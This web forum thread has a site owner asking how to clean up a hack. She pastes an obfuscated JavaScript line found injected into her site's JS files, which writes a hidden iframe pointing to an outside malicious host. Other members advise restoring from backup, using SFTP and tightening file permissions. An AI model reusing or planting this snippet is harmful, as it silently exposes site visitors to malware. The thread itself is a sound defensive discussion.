website says malware

[Lisa23]

Hi guys my website just been hacked google showing the red (Warning: Something's Not Right Here!

www.xxxxxxxx.com contains malware. Your computer might catch a virus if you visit this site.)

 

stating the site has trying to access these two sites

http://bentley.poststreetdental.com/...f48be84d67654d

http://mazda.georgewkohn.com/direct....f48be84d67654d

 

Now found alot of my js files to have this code at the bottom when i remove it minimise the amount of error on chrome console inspector element, does anyone know if someone actually opened logged in to my FTP accessed the js files and paste those code into it. or if it is some sort of a program that does wrote that.

 

var _0x965b=["\x3C\x64\x69\x76\x20\x6E\x61\x6D\x65\x3D\x22\x79\x6F\x75\x74\x75\x62\x65\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x22\x35\x36\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x33\x31\x35\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x7A\x64\x61\x2E\x67\x65\x6F\x72\x67\x65\x77\x6B\x6F\x68\x6E\x2E\x63\x6F\x6D\x2F\x64\x69\x72\x65\x63\x74\x2E\x70\x68\x70\x3F\x70\x61\x67\x65\x3D\x31\x35\x66\x34\x38\x62\x65\x38\x34\x64\x36\x37\x36\x35\x34\x64\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];document[_0x965b[1]](_0x965b[0]);

 

At momment i am trying going to every single file and delete that line of code, but I am not sure if it might be something else or if somone has a way of accessing my FTP i've changed the password.

 

Any sugestion?

 

Do I just delete the code on JS files? or should I look for something else on the server?

[haku]

Your best bet is to wipe all the files from your web root and upload a backup.

 

Also, FTP is insecure as it submits your password unencrypted. You should use SFTP, which does the file transfers over SSH which is an encrypted protocol. You may need to have your host enable this for you though, as some do not enable it by default.

[Lisa23]

Thanks for your reply, but so those code are paste on some js files does that mean they actually logged in to the server? or they sent some sort of program that bypass hosting security?

[haku]

Could be either. This is why you are best off wiping everything and re-installing from a backup. This will ensure that there are no files in your web directory that you didn't put there.

[Lisa23]

scary ok I've changed my FTP password  but if you saying that it could be be someone that logged password changed now but  a program that bypassed security, if i upload the back up how can i prevent the same from happening if is program thats bypassing security? very scared.

 

I know alot people use htaccess file to secure site, i dont know much so I am scared to change mine fo you recomemnd any htacess script?

[haku]

My biggest recommendation is just to stop using FTP. Also, you should look at your file permissions, and make sure files are not writable by anyone other than the file owner.

[kicken]

... but  a program that bypassed security, if i upload the back up how can i prevent the same from happening if is program thats bypassing security?

 

If it were a case of the host being hacked the only thing really would be to change hosts.  However, it is far more likely that the problem is the result of your FTP password being stolen (keylogger, sniffed, virus, etc), or the file being modified via a vulnerability in something of yours (php script, cms, etc).  People always want to blame the host when something like this happens, but rarely is it ever actually the hosts fault.